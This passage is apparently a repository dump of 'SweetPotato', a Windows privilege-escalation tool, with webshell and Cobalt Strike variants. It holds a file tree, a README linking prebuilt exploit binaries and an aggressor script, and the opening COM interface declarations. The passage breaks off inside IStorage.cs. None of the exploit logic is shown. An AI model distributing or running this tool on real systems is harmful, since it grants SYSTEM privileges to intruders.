├── README.md
├── SweetPotato-CS-old
├── .gitattributes
├── .gitignore
├── Com
│ ├── IEnumSTATSTG.cs
│ ├── ILockBytes.cs
│ ├── IMarshal.cs
│ ├── IStorage.cs
│ ├── IStream.cs
│ └── Ole32.cs
├── LICENSE
├── LocalNegotiator.cs
├── ObjRef.cs
├── Options.cs
├── PotatoAPI.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── README.md
├── Security
│ ├── Privilege.cs
│ └── SSPIHelper.cs
├── StorageTrigger.cs
├── SweetPotato.cna
├── SweetPotato.csproj
├── SweetPotato.sln
├── app.config
├── app.manifest
└── bin
│ └── Release
│ ├── SweetPotato.cna
│ └── SweetPotato.exe
├── SweetPotato-Webshell-new
├── .vs
│ └── SweetPotato
│ │ └── v16
│ │ └── .suo
├── 12345678-1234-abcd-ef00-0123456789ab_1.0.cs
├── Com
│ ├── IEnumSTATSTG.cs
│ ├── ILockBytes.cs
│ ├── IMarshal.cs
│ ├── IStorage.cs
│ ├── IStream.cs
│ └── Ole32.cs
├── FodyWeavers.xml
├── FodyWeavers.xsd
├── LocalNegotiator.cs
├── NtApiDotNet
│ ├── AccessCheckResult.cs
│ ├── AccessMask.cs
│ ├── AccessMaskEntry.cs
│ ├── Ace.cs
│ ├── Acl.cs
│ ├── AlpcMessage.cs
│ ├── AlpcMessageAttributes.cs
│ ├── AlpcPortSection.cs
│ ├── AnnontationAttributes.cs
│ ├── BoundaryDescriptor.cs
│ ├── BufferUtils.cs
│ ├── CachedEnumerable.cs
│ ├── ClaimSecurityAttribute.cs
│ ├── CreateUserProcess.cs
│ ├── CreateUserProcessResult.cs
│ ├── DebugEvent.cs
│ ├── DisposableList.cs
│ ├── EaBuffer.cs
│ ├── Forms
│ │ ├── AclViewerControl.Designer.cs
│ │ ├── AclViewerControl.cs
│ │ ├── AclViewerControl.resx
│ │ ├── Lock.ico
│ │ ├── SecurityDescriptorViewerControl.Designer.cs
│ │ ├── SecurityDescriptorViewerControl.cs
│ │ ├── SecurityDescriptorViewerControl.resx
│ │ ├── SecurityDescriptorViewerForm.Designer.cs
│ │ ├── SecurityDescriptorViewerForm.cs
│ │ └── SecurityDescriptorViewerForm.resx
│ ├── GenericMapping.cs
│ ├── INtTransaction.cs
│ ├── KnownSids.cs
│ ├── MandatoryLabelAce.cs
│ ├── MappedFile.cs
│ ├── MemoryInformation.cs
│ ├── Ndr
│ │ ├── Marshal
│ │ │ ├── INdrConformantStructure.cs
│ │ │ ├── INdrNonEncapsulatedUnion.cs
│ │ │ ├── INdrStructure.cs
│ │ │ ├── NdrContextHandle.cs
│ │ │ ├── NdrDataRepresentation.cs
│ │ │ ├── NdrDeferralStack.cs
│ │ │ ├── NdrEmbeddedPointer.cs
│ │ │ ├── NdrEmpty.cs
│ │ │ ├── NdrEnum16.cs
│ │ │ ├── NdrInt3264.cs
│ │ │ ├── NdrInterfacePointer.cs
│ │ │ ├── NdrMarshalBuffer.cs
│ │ │ ├── NdrPickledType.cs
│ │ │ ├── NdrPipe.cs
│ │ │ ├── NdrUnmarshalBuffer.cs
│ │ │ └── NdrUnsupported.cs
│ │ ├── NdrArrayTypes.cs
│ │ ├── NdrComProxyDefinition.cs
│ │ ├── NdrCorrelationDescriptor.cs
│ │ ├── NdrExpression.cs
│ │ ├── NdrFormatter.cs
│ │ ├── NdrHandleTypes.cs
│ │ ├── NdrMiscTypes.cs
│ │ ├── NdrNativeUtils.cs
│ │ ├── NdrParser.cs
│ │ ├── NdrParserException.cs
│ │ ├── NdrPointerTypes.cs
│ │ ├── NdrProcedureDefinition.cs
│ │ ├── NdrProtocolSequenceEndpoint.cs
│ │ ├── NdrRpcServerInterface.cs
│ │ ├── NdrSimpleTypes.cs
│ │ ├── NdrStringBuilder.cs
│ │ ├── NdrStringTypes.cs
│ │ ├── NdrStructureTypes.cs
│ │ ├── NdrUnionTypes.cs
│ │ └── NdrUserMarshalTypes.cs
│ ├── NtAlpc.cs
│ ├── NtAlpcNative.cs
│ ├── NtAlpcUtils.cs
│ ├── NtApiDotNet.Core.csproj
│ ├── NtApiDotNet.csproj
│ ├── NtApiDotNet.nuspec
│ ├── NtAsyncResult.cs
│ ├── NtAtom.cs
│ ├── NtAtomNative.cs
│ ├── NtDebug.cs
│ ├── NtDebugNative.cs
│ ├── NtDesktop.cs
│ ├── NtDesktopNative.cs
│ ├── NtDirectory.cs
│ ├── NtDirectoryNative.cs
│ ├── NtEnlistment.cs
│ ├── NtEnlistmentNative.cs
│ ├── NtEtwRegistration.cs
│ ├── NtEvent.cs
│ ├── NtEventNative.cs
│ ├── NtException.cs
│ ├── NtFile.cs
│ ├── NtFileNative.cs
│ ├── NtFileUtils.cs
│ ├── NtGeneric.cs
│ ├── NtHandle.cs
│ ├── NtHeap.cs
│ ├── NtIoCompletion.cs
│ ├── NtIoCompletionNative.cs
│ ├── NtIoControlCode.cs
│ ├── NtJob.cs
│ ├── NtJobNative.cs
│ ├── NtKey.cs
│ ├── NtKeyNative.cs
│ ├── NtKeyUtils.cs
│ ├── NtKeyValue.cs
│ ├── NtLdr.cs
│ ├── NtLdrNative.cs
│ ├── NtLocale.cs
│ ├── NtMappedSection.cs
│ ├── NtMutant.cs
│ ├── NtMutantNative.cs
│ ├── NtNamedPipeFile.cs
│ ├── NtObject.cs
│ ├── NtObjectNative.cs
│ ├── NtObjectUtils.cs
│ ├── NtObjectWithDuplicate.cs
│ ├── NtObjectWithDuplicateAndInfo.cs
│ ├── NtPartition.cs
│ ├── NtPartitionNative.cs
│ ├── NtProcess.cs
│ ├── NtProcessCreateConfig.cs
│ ├── NtProcessCreateResult.cs
│ ├── NtProcessMitigations.cs
│ ├── NtProcessNative.cs
│ ├── NtProcessTrustletConfig.cs
│ ├── NtRegistryTransaction.cs
│ ├── NtRegistryTransactionNative.cs
│ ├── NtResourceManager.cs
│ ├── NtResourceManagerNative.cs
│ ├── NtResult.cs
│ ├── NtRtl.cs
│ ├── NtSection.cs
│ ├── NtSectionNative.cs
│ ├── NtSecurity.cs
│ ├── NtSecurityNative.cs
│ ├── NtSemaphore.cs
│ ├── NtSemaphoreNative.cs
│ ├── NtSession.cs
│ ├── NtStatus.cs
│ ├── NtStructures.cs
│ ├── NtSymbolicLink.cs
│ ├── NtSymbolicLinkNative.cs
│ ├── NtSystemInfo.cs
│ ├── NtSystemInfoNative.cs
│ ├── NtThread.cs
│ ├── NtThreadNative.cs
│ ├── NtTimer.cs
│ ├── NtTimerNative.cs
│ ├── NtToken.cs
│ ├── NtTokenNative.cs
│ ├── NtTrace.cs
│ ├── NtTraceNative.cs
│ ├── NtTransaction.cs
│ ├── NtTransactionManager.cs
│ ├── NtTransactionManagerNative.cs
│ ├── NtTransactionManagerUtils.cs
│ ├── NtTransactionNative.cs
│ ├── NtType.cs
│ ├── NtTypeFactory.cs
│ ├── NtUserProcessParameters.cs
│ ├── NtVirtualMemory.cs
│ ├── NtVirtualMemoryNative.cs
│ ├── NtWait.cs
│ ├── NtWaitHandle.cs
│ ├── NtWaitNative.cs
│ ├── NtWaitTimeout.cs
│ ├── NtWindow.cs
│ ├── NtWindowNative.cs
│ ├── NtWindowStation.cs
│ ├── NtWindowStationNative.cs
│ ├── NtWnf.cs
│ ├── NtWnfNative.cs
│ ├── NtWnfWellKnownNames.cs
│ ├── ObjectAttributes.cs
│ ├── OptionalValues.cs
│ ├── PrivilegeCheckResult.cs
│ ├── ProcessAttribute.cs
│ ├── ProcessModule.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ ├── Readme.txt
│ ├── ReparseBuffer.cs
│ ├── SafeAlpcDataViewBuffer.cs
│ ├── SafeAlpcPortMessageBuffer.cs
│ ├── SafeAlpcPortSectionHandle.cs
│ ├── SafeAlpcSecurityContextHandle.cs
│ ├── SafeArrayBuffer.cs
│ ├── SafeBufferGeneric.cs
│ ├── SafeHGlobalBuffer.cs
│ ├── SafeHandleListHandle.cs
│ ├── SafeIoStatusBuffer.cs
│ ├── SafeKernelObjectHandle.cs
│ ├── SafePrivilegeSetBuffer.cs
│ ├── SafeProcessHeapBuffer.cs
│ ├── SafeProcessParametersBuffer.cs
│ ├── SafeSidBufferHandle.cs
│ ├── SafeStringBuffer.cs
│ ├── SafeStructureInOutBuffer.cs
│ ├── SafeTokenGroupsBuffer.cs
│ ├── SafeTokenPrivilegesBuffer.cs
│ ├── Security
│ │ └── Policy
│ │ │ ├── CentralAccessPolicy.cs
│ │ │ └── CentralAccessRule.cs
│ ├── SecurityCapabilities.cs
│ ├── SecurityDescriptor.cs
│ ├── SecurityDescriptorSid.cs
│ ├── SecurityQualityOfService.cs
│ ├── Sid.cs
│ ├── SidIdentifierAuthority.cs
│ ├── ThreadImpersonationContext.cs
│ ├── TokenGroupsBuilder.cs
│ ├── TokenPrivilege.cs
│ ├── TokenPrivilegesBuilder.cs
│ ├── UnicodeString.cs
│ ├── UnicodeStringBytesSafeBuffer.cs
│ ├── UserGroup.cs
│ ├── Utilities
│ │ ├── ASN1
│ │ │ ├── ASN1Utils.cs
│ │ │ ├── DERParser.cs
│ │ │ ├── DERTagType.cs
│ │ │ ├── DERUtils.cs
│ │ │ ├── DERValue.cs
│ │ │ ├── OIDValues.cs
│ │ │ └── UniversalTag.cs
│ │ ├── Memory
│ │ │ ├── CrossBitnessProcessMemoryReader.cs
│ │ │ ├── CrossBitnessTypeAttribute.cs
│ │ │ ├── CurrentProcessMemoryReader.cs
│ │ │ ├── IMemoryReader.cs
│ │ │ ├── ProcessMemoryReader.cs
│ │ │ ├── ProcessMemoryStream.cs
│ │ │ └── SafeBufferWrapper.cs
│ │ ├── SafeBuffers
│ │ │ └── SafeGuidArrayBuffer.cs
│ │ ├── Security
│ │ │ ├── MD4.cs
│ │ │ └── ObjectTypeTree.cs
│ │ ├── Text
│ │ │ ├── BinaryEncoding.cs
│ │ │ ├── HexDumpBuilder.cs
│ │ │ └── StringUtils.cs
│ │ └── Token
│ │ │ └── ClaimSecurityAttributeBuilder.cs
│ ├── Win32
│ │ ├── AppContainerProfile.cs
│ │ ├── ConsoleSession.cs
│ │ ├── Debugger
│ │ │ ├── ArrayTypeInformation.cs
│ │ │ ├── BaseTypeInformation.cs
│ │ │ ├── DataSymbolInformation.cs
│ │ │ ├── DbgHelpSymbolResolver.cs
│ │ │ ├── EnumProcessModulesFilter.cs
│ │ │ ├── EnumTypeInformation.cs
│ │ │ ├── IMAGEHLP_MODULE64.cs
│ │ │ ├── IMAGEHLP_SYMBOL_TYPE_INFO.cs
│ │ │ ├── ISymbolTypeResolver.cs
│ │ │ ├── MODULEINFO.cs
│ │ │ ├── PointerTypeInformation.cs
│ │ │ ├── SYMBOL_INFO.cs
│ │ │ ├── SYM_TYPE.cs
│ │ │ ├── SymOptions.cs
│ │ │ ├── SymTagEnum.cs
│ │ │ ├── SymbolInformation.cs
│ │ │ ├── SymbolInformationType.cs
│ │ │ ├── TI_FINDCHILDREN_PARAMS.cs
│ │ │ ├── TypeInformation.cs
│ │ │ ├── TypeInformationCache.cs
│ │ │ ├── UdtKind.cs
│ │ │ └── UserDefinedTypeInformation.cs
│ │ ├── Device
│ │ │ ├── DeviceNativeMethods.cs
│ │ │ └── DeviceUtils.cs
│ │ ├── DirectoryService
│ │ │ ├── DirectoryServiceAccessRights.cs
│ │ │ └── DirectoryServiceUtils.cs
│ │ ├── EtwServiceTriggerInformation.cs
│ │ ├── EventTrace.cs
│ │ ├── EventTraceLog.cs
│ │ ├── EventTraceProvider.cs
│ │ ├── EventTracing.cs
│ │ ├── ExecutableManifest.cs
│ │ ├── ISymbolResolver.cs
│ │ ├── LogonUtils.cs
│ │ ├── PackageIdentity.cs
│ │ ├── Rpc
│ │ │ ├── CodeGenUtils.cs
│ │ │ ├── MarshalHelperBuilder.cs
│ │ │ ├── RpcClientBase.cs
│ │ │ ├── RpcClientBuilder.cs
│ │ │ ├── RpcClientBuilderArguments.cs
│ │ │ ├── RpcClientResponse.cs
│ │ │ ├── RpcTypeDescriptor.cs
│ │ │ ├── RpcUtils.cs
│ │ │ └── Transport
│ │ │ │ ├── ExtendedErrorInfo.cs
│ │ │ │ ├── IRpcClientTransport.cs
│ │ │ │ ├── RpcAlpcClientTransport.cs
│ │ │ │ ├── RpcAlpcInternals.cs
│ │ │ │ ├── RpcClientTransportFactory.cs
│ │ │ │ ├── RpcExtendedErrorInfo.cs
│ │ │ │ └── RpcFaultException.cs
│ │ ├── RpcAlpcServer.cs
│ │ ├── RpcClient.cs
│ │ ├── RpcEndpoint.cs
│ │ ├── RpcEndpointMapper.cs
│ │ ├── RpcServer.cs
│ │ ├── RunningService.cs
│ │ ├── SafeHandles
│ │ │ ├── SafeAuditBuffer.cs
│ │ │ ├── SafeAuthZClientContextHandle.cs
│ │ │ ├── SafeAuthZResourceManagerHandle.cs
│ │ │ ├── SafeCoTaskMemHandle.cs
│ │ │ ├── SafeLocalAllocBuffer.cs
│ │ │ ├── SafeLsaHandle.cs
│ │ │ ├── SafeLsaLogonHandle.cs
│ │ │ ├── SafeLsaMemoryBuffer.cs
│ │ │ └── SafeLsaReturnBufferHandle.cs
│ │ ├── SafeLoadLibraryHandle.cs
│ │ ├── SafeWin32Exception.cs
│ │ ├── Security
│ │ │ ├── Audit
│ │ │ │ ├── AuditAccessRights.cs
│ │ │ │ ├── AuditCategory.cs
│ │ │ │ ├── AuditGlobalSaclType.cs
│ │ │ │ ├── AuditPolicyEventType.cs
│ │ │ │ ├── AuditPolicyFlags.cs
│ │ │ │ ├── AuditSecurityUtils.cs
│ │ │ │ └── AuditSubCategory.cs
│ │ │ ├── Authentication
│ │ │ │ ├── ASN1AuthenticationToken.cs
│ │ │ │ ├── AuthenticationCredentials.cs
│ │ │ │ ├── AuthenticationFlags.cs
│ │ │ │ ├── AuthenticationImpersonationContext.cs
│ │ │ │ ├── AuthenticationPackage.cs
│ │ │ │ ├── AuthenticationToken.cs
│ │ │ │ ├── ClientAuthenticationContext.cs
│ │ │ │ ├── CredentialHandle.cs
│ │ │ │ ├── GSSAPIUtils.cs
│ │ │ │ ├── IAuthenticationContext.cs
│ │ │ │ ├── Kerberos
│ │ │ │ │ ├── KRB_CHKSUM_TYPE.cs
│ │ │ │ │ ├── KRB_ENC_TYPE.cs
│ │ │ │ │ ├── KRB_MSG_TYPE.cs
│ │ │ │ │ ├── KRB_NAME_TYPE.cs
│ │ │ │ │ ├── KerberosAPReplyAuthenticationToken.cs
│ │ │ │ │ ├── KerberosAPRequestAuthenticationToken.cs
│ │ │ │ │ ├── KerberosAuthenticationToken.cs
│ │ │ │ │ ├── KerberosEncryptedData.cs
│ │ │ │ │ ├── KerberosKey.cs
│ │ │ │ │ ├── KerberosTGTReplyAuthenticationToken.cs
│ │ │ │ │ ├── KerberosTGTRequestAuthenticationToken.cs
│ │ │ │ │ ├── KerberosTicket.cs
│ │ │ │ │ ├── KerberosUtils.cs
│ │ │ │ │ └── PrincipalName.cs
│ │ │ │ ├── LogonSession.cs
│ │ │ │ ├── Negotiate
│ │ │ │ │ └── NegotiateAuthenticationToken.cs
│ │ │ │ ├── Ntlm
│ │ │ │ │ ├── NtlmAuthenticateAuthenticationToken.cs
│ │ │ │ │ ├── NtlmAuthenticateAuthenticationTokenV2.cs
│ │ │ │ │ ├── NtlmAuthenticationToken.cs
│ │ │ │ │ ├── NtlmAvPair.cs
│ │ │ │ │ ├── NtlmChallengeAuthenticationToken.cs
│ │ │ │ │ ├── NtlmNegotiateAuthenticationToken.cs
│ │ │ │ │ └── NtlmUtils.cs
│ │ │ │ ├── ServerAuthenticationContext.cs
│ │ │ │ ├── ServicePrincipalName.cs
│ │ │ │ └── UserCredentials.cs
│ │ │ ├── Authorization
│ │ │ │ ├── AuthZAccessCheckResult.cs
│ │ │ │ ├── AuthZContext.cs
│ │ │ │ ├── AuthZResourceManager.cs
│ │ │ │ ├── ProgressInvokeSetting.cs
│ │ │ │ ├── SeObjectType.cs
│ │ │ │ ├── SecurityDescriptorInheritanceSource.cs
│ │ │ │ └── TreeSecInfo.cs
│ │ │ ├── Native
│ │ │ │ ├── AUDIT_POLICY_INFORMATION.cs
│ │ │ │ ├── AUTHZ_ACCESS_REPLY.cs
│ │ │ │ ├── AUTHZ_ACCESS_REQUEST.cs
│ │ │ │ ├── AUTHZ_CONTEXT_INFORMATION_CLASS.cs
│ │ │ │ ├── AuthZAccessCheckFlags.cs
│ │ │ │ ├── CENTRAL_ACCESS_POLICY.cs
│ │ │ │ ├── CENTRAL_ACCESS_POLICY_ENTRY.cs
│ │ │ │ ├── INHERITED_FROM.cs
│ │ │ │ ├── KERB_LOGON_SUBMIT_TYPE.cs
│ │ │ │ ├── KERB_S4U_LOGON.cs
│ │ │ │ ├── KERB_TICKET_LOGON.cs
│ │ │ │ ├── LSA_ENUMERATION_INFORMATION.cs
│ │ │ │ ├── LSA_LAST_INTER_LOGON_INFO.cs
│ │ │ │ ├── LsaLogonUserFlags.cs
│ │ │ │ ├── LsaString.cs
│ │ │ │ ├── OptionalLuid.cs
│ │ │ │ ├── POLICY_AUDIT_SID_ARRAY.cs
│ │ │ │ ├── QUOTA_LIMITS.cs
│ │ │ │ ├── SECPKG_ATTR.cs
│ │ │ │ ├── SECURITY_LOGON_SESSION_DATA.cs
│ │ │ │ ├── SEC_CHANNEL_BINDING.cs
│ │ │ │ ├── SEC_WINNT_AUTH_IDENTITY.cs
│ │ │ │ ├── SEC_WINNT_AUTH_IDENTITY_EX.cs
│ │ │ │ ├── SecBuffer.cs
│ │ │ │ ├── SecBufferDesc.cs
│ │ │ │ ├── SecBufferType.cs
│ │ │ │ ├── SecHandle.cs
│ │ │ │ ├── SecPkgContextStructs.cs
│ │ │ │ ├── SecPkgContext_SessionKey.cs
│ │ │ │ ├── SecPkgInfo.cs
│ │ │ │ ├── SecStatusCode.cs
│ │ │ │ ├── SecWinNtAuthIdentityFlags.cs
│ │ │ │ ├── SecureStringMarshal.cs
│ │ │ │ ├── SecurityNativeMethods.cs
│ │ │ │ └── TOKEN_SOURCE.cs
│ │ │ ├── Policy
│ │ │ │ ├── AccountRight.cs
│ │ │ │ ├── AccountRightLogonType.cs
│ │ │ │ └── LsaPolicyAccessRights.cs
│ │ │ └── Win32Security.cs
│ │ ├── SecurityInformationImpl.cs
│ │ ├── SendInput.cs
│ │ ├── ServiceInformation.cs
│ │ ├── ServiceTriggerCustomData.cs
│ │ ├── ServiceTriggerInformation.cs
│ │ ├── ServiceUtils.cs
│ │ ├── SymbolLoadedModule.cs
│ │ ├── SymbolResolver.cs
│ │ ├── TokenUtils.cs
│ │ ├── Win32Debug.cs
│ │ ├── Win32Error.cs
│ │ ├── Win32NativeMethods.cs
│ │ ├── Win32Process.cs
│ │ ├── Win32ProcessConfig.cs
│ │ ├── Win32ProcessNative.cs
│ │ ├── Win32Utils.cs
│ │ └── WnfServiceTriggerInformation.cs
│ └── packages.config
├── ObjRef.cs
├── Options.cs
├── PotatoAPI.cs
├── PrintSpoofer.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Security
│ ├── Privilege.cs
│ └── SSPIHelper.cs
├── StorageTrigger.cs
├── SweetPotato.csproj
├── SweetPotato.sln
├── app.config
├── app.manifest
├── bin
│ └── Release
│ │ └── SweetPotato.exe
├── packages.config
└── packages
│ ├── Costura.Fody.4.1.0
│ ├── .signature.p7s
│ ├── Costura.Fody.4.1.0.nupkg
│ ├── build
│ │ └── Costura.Fody.props
│ ├── lib
│ │ └── net40
│ │ │ ├── Costura.dll
│ │ │ └── Costura.xml
│ └── weaver
│ │ ├── Costura.Fody.dll
│ │ └── Costura.Fody.xcf
│ └── Fody.6.0.0
│ ├── .signature.p7s
│ ├── Fody.6.0.0.nupkg
│ ├── build
│ └── Fody.targets
│ ├── netclassictask
│ ├── Fody.dll
│ ├── FodyCommon.dll
│ ├── FodyHelpers.dll
│ ├── FodyIsolated.dll
│ ├── Mono.Cecil.Pdb.dll
│ ├── Mono.Cecil.Pdb.pdb
│ ├── Mono.Cecil.Rocks.dll
│ ├── Mono.Cecil.Rocks.pdb
│ ├── Mono.Cecil.dll
│ └── Mono.Cecil.pdb
│ └── netstandardtask
│ ├── Fody.dll
│ ├── FodyCommon.dll
│ ├── FodyHelpers.dll
│ ├── FodyIsolated.dll
│ ├── Mono.Cecil.Pdb.dll
│ ├── Mono.Cecil.Pdb.pdb
│ ├── Mono.Cecil.Rocks.dll
│ ├── Mono.Cecil.Rocks.pdb
│ ├── Mono.Cecil.dll
│ └── Mono.Cecil.pdb
├── SweetPotato-Webshell-old
├── Com
│ ├── IEnumSTATSTG.cs
│ ├── ILockBytes.cs
│ ├── IMarshal.cs
│ ├── IStorage.cs
│ ├── IStream.cs
│ └── Ole32.cs
├── LICENSE
├── LocalNegotiator.cs
├── ObjRef.cs
├── Options.cs
├── PotatoAPI.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Security
│ ├── Privilege.cs
│ └── SSPIHelper.cs
├── StorageTrigger.cs
├── SweetPotato.csproj
├── SweetPotato.sln
├── app.config
├── app.manifest
└── bin
│ └── Release
│ └── SweetPotato.exe
└── img
├── cs-old.png
├── cs-old2.png
├── webshell-new.png
└── webshell-old.png
/README.md:
--------------------------------------------------------------------------------
1 | # SweetPotato
2 |
3 | #### download
4 |
5 | [SweetPotato.exe](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe)
6 |
7 |
8 | #### img
9 |
10 | ### SweetPotato-Webshell-new
11 |
12 | 
13 |
14 |
15 |
16 | ### SweetPotato-Webshell-old
17 |
18 | #### download
19 |
20 | [SweetPotato.exe](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-Webshell-old/bin/Release/SweetPotato.exe)
21 |
22 | #### img
23 |
24 | 
25 |
26 | ### SweetPotato-CS-old
27 |
28 | #### download
29 |
30 | [SweetPotato.cna](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-CS-old/bin/Release/SweetPotato.cna)
31 |
32 | [SweetPotato.exe](https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-CS-old/bin/Release/SweetPotato.exe)
33 |
34 | #### img
35 |
36 | - CNA
37 |
38 | 
39 |
40 |
41 |
42 | - CLI
43 |
44 | 
45 |
46 | ### Reference
47 |
48 | https://github.com/CCob/SweetPotato
49 |
50 | https://github.com/Tycx2ry/SweetPotato_CS
--------------------------------------------------------------------------------
/SweetPotato-CS-old/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IEnumSTATSTG.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace SweetPotato {
    /// <summary>
    /// Managed declaration of the COM structured-storage enumerator IEnumSTATSTG.
    /// [ComImport] marks it as an interface defined outside this assembly; the Guid
    /// attribute carries its IID and InterfaceIsIUnknown selects an IUnknown-based
    /// (non-dispatch) vtable.
    /// </summary>
    /// <remarks>
    /// The members are declared in the order Next, Skip, Reset, Clone. For an imported
    /// COM interface the declaration order is the vtable order, so it must not change.
    /// </remarks>
    [ComImport]
    [Guid("0000000d-0000-0000-C000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IEnumSTATSTG {
        // The user needs to allocate an STATSTG array whose size is celt.
        // [PreserveSig] returns the raw HRESULT as the uint result instead of
        // turning a failure code into an exception.
        [PreserveSig]
        uint
        Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched);

        // No [PreserveSig] on the remaining members: a failure HRESULT surfaces
        // as a managed exception.
        void Skip(uint celt);

        void Reset();

        // The return value is marshalled as a COM interface pointer.
        [return: MarshalAs(UnmanagedType.Interface)]
        IEnumSTATSTG Clone();
    }
}
22 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/ILockBytes.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace SweetPotato {
    /// <summary>
    /// Managed declaration of the COM ILockBytes interface (byte-array storage with
    /// region locking). Imported via [ComImport] with the IID in the Guid attribute,
    /// and hidden from COM type-library export by [ComVisible(false)].
    /// </summary>
    /// <remarks>
    /// Declaration order is the vtable order and must not change. ReadAt and WriteAt
    /// take a raw IntPtr plus a byte count; nothing in this declaration ties cb to the
    /// size of the buffer behind pv, so an implementer or caller has to bound it.
    /// </remarks>
    [ComVisible(false)]
    [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")]
    public interface ILockBytes {
        // Note: These two by-reference 32-bit integers (ULONG) could be used as return values instead,
        // but they are not tagged [retval] in the IDL, so for consistency's sake...
        void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead);
        void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten);
        void Flush();
        void SetSize(long cb);
        void LockRegion(long libOffset, long cb, int dwLockType);
        void UnlockRegion(long libOffset, long cb, int dwLockType);
        void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag);

    }


}
22 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IMarshal.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace SweetPotato {

    /// <summary>
    /// Managed declaration of the COM IMarshal interface (custom marshalling of an
    /// interface pointer into and out of a stream). Imported via [ComImport]; the
    /// Guid attribute carries the IID.
    /// </summary>
    /// <remarks>
    /// The attributes use numeric enum values: InterfaceType(1) is
    /// ComInterfaceType.InterfaceIsIUnknown and MarshalAs(28) is
    /// UnmanagedType.Interface. Declaration order is the vtable order and must not
    /// change. No member has [PreserveSig], so a failure HRESULT surfaces as a
    /// managed exception.
    /// </remarks>
    [Guid("00000003-0000-0000-C000-000000000046")]
    [InterfaceType(1)]
    [ComConversionLoss]
    [ComImport]
    public interface IMarshal {

        // pv and pvDestContext are raw pointers; the parameter named MSHLFLAGS carries the marshal flags value.
        void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid);
        void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize);
        // pstm is passed as a COM interface pointer to this project's IStream declaration.
        void MarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS);
        // ppv comes back as an untyped pointer; the caller is responsible for treating it as the interface named by riid.
        void UnmarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, out IntPtr ppv);
        void ReleaseMarshalData([MarshalAs(28)] [In] IStream pstm);
        void DisconnectObject([In] uint dwReserved);
    }
}
20 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Com/IStorage.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace SweetPotato {

    /// <summary>
    /// Managed declaration of the COM IStorage interface (a structured-storage
    /// container holding streams and nested storages). Imported via [ComImport];
    /// the Guid attribute carries the IID.
    /// </summary>
    /// <remarks>
    /// The attributes use numeric enum values: InterfaceType(1) is
    /// ComInterfaceType.InterfaceIsIUnknown, MarshalAs(21) is UnmanagedType.LPWStr,
    /// MarshalAs(28) is UnmanagedType.Interface and MarshalAs(42) is
    /// UnmanagedType.LPArray. Declaration order is the vtable order and must not
    /// change. No member has [PreserveSig], so a failure HRESULT surfaces as a
    /// managed exception.
    /// </remarks>
    [InterfaceType(1)]
    [ComConversionLoss]
    [Guid("0000000B-0000-0000-C000-000000000046")]
    [ComImport]
    public interface IStorage {
        // Element names are marshalled as wide strings; returned streams and storages as interface pointers.
        void CreateStream([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
        void OpenStream([MarshalAs(21)] [In] string pwcsName, [In] IntPtr reserved1, [In] uint grfMode, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
        void CreateStorage([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStorage ppstg);
        void OpenStorage([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgPriority, [In] uint grfMode, [In] IntPtr snbExclude, [In] uint reserved, [MarshalAs(28)] out IStorage ppstg);
        // SizeParamIndex = 0 tells the marshaller that ciidExclude is the element count of rgiidExclude.
        void CopyTo([In] uint ciidExclude, [MarshalAs(42, SizeParamIndex = 0)] [In] Guid[] rgiidExclude, [In] IntPtr snbExclude, [MarshalAs(28)] [In] IStorage pstgDest);
        void MoveElementTo([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgDest, [MarshalAs(21)] [In] string pwcsNewName, [In] uint grfFlags);
        void Commit([In] uint grfCommitFlags);
        void Revert();
        void EnumElements([In] uint reserved1, [In] IntPtr reserved2, [In] uint reserved3, [MarshalAs(28)] out IEnumSTATSTG ppEnum);
        void DestroyElement([MarshalAs(21)] [In] string pwcsName);
        void RenameElement([MarshalAs(21)] [In] string pwcsOldName, [MarshalAs(21)] [In] string pwcsNewName);
        // The three timestamps are declared as arrays rather than single FILETIME values.
        void SetElementTimes([MarshalAs(21)] [In] string pwcsName, [MarshalAs(42)] [In] FILETIME[] pctime, [MarshalAs(42)] [In] FILETIME[] patime, [MarshalAs(42)] [In] FILETIME[] pmtime);
        void SetClass([In] ref Guid clsid);
